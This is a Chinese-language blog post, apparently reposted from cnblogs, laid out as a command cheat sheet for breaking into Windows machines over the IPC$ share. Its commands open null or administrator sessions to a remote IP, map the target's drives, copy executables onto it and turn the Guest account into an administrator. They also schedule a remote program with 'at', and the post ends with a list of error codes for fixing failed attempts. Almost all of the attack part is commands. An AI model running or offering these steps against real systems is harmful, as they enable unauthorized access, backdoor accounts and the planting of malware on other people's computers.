标签:view 远程主机复制文件 提示 路径 否则 love 服务 ini 分析
首先保证目标的IPC服务启动,服务为lanmanWorkstation,显示名为Workstations
telnet目标计算机lanmanWorkstation服务的两个端口,即139和445
telnet ip 139
telnet ip 445
这些要写成shell脚本copy到目标计算机下执行
net share ipc$
关闭
net share ipc$ /del
net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)
net use \\222.222.221.102\ipc$ "" /user:"administrator"
删除一个ipc$连接
net use \\IP\ipc$ /del
net use z: \\IP\Disk$
net use z: \\222.222.221.102\d$
删除共享映射
net use z: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
查看远程主机的共享资源(但看不到默认共享)
net view \\IP
向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
查看用户名
net user
查看帐户的属性
net user 帐户名
激活Guest用户
net user guest /active:yes
修改Guest密码
net user guest 123456
Guest变为Administrator
net localgroup administrators guest /add
远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1327,用户账户限制阻止了此用户进行登录;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
标签:view 远程主机复制文件 提示 路径 否则 love 服务 ini 分析
原文地址:https://www.cnblogs.com/aeolian/p/8327384.html
